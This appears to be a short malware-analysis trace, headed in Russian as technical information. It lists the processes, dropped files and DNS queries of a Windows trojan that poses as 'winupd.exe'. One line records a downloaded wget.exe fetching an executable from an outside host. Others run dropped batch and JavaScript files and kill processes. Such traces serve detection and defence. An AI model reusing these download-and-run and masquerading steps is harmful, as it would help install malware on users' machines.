Техническая информация
- '%TEMP%\1.tmp\wget.exe' ###http://rg##st.ru/download/51823108/af72b91d1764defb7ac12ffe22cf20e27592dfb0/skrini.exe###
- '%WINDIR%\winupd.exe'
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\winupd.bat" "
- '<SYSTEM32>\ping.exe' ya.ru -n 5
- '<SYSTEM32>\taskkill.exe' /f /im winupd.exe
- '<SYSTEM32>\wscript.exe' "%TEMP%\stop.js"
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\reg.bat" "
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7ZSfx000.cmd" "
- %WINDIR%\winupd.exe
- %TEMP%\1.tmp\winupd.bat
- %TEMP%\1.tmp\wget.exe
- %TEMP%\7ZSfx000.cmd
- %TEMP%\stop.js
- %TEMP%\reg.bat
- %TEMP%\winupd.exe
- %WINDIR%\winupd.exe
- %TEMP%\1.tmp\wget.exe
- %TEMP%\7ZSfx000.cmd
- %TEMP%\stop.js
- %TEMP%\winupd.exe
- DNS ASK ya.ru
- ClassName: '(null)' WindowName: '(null)'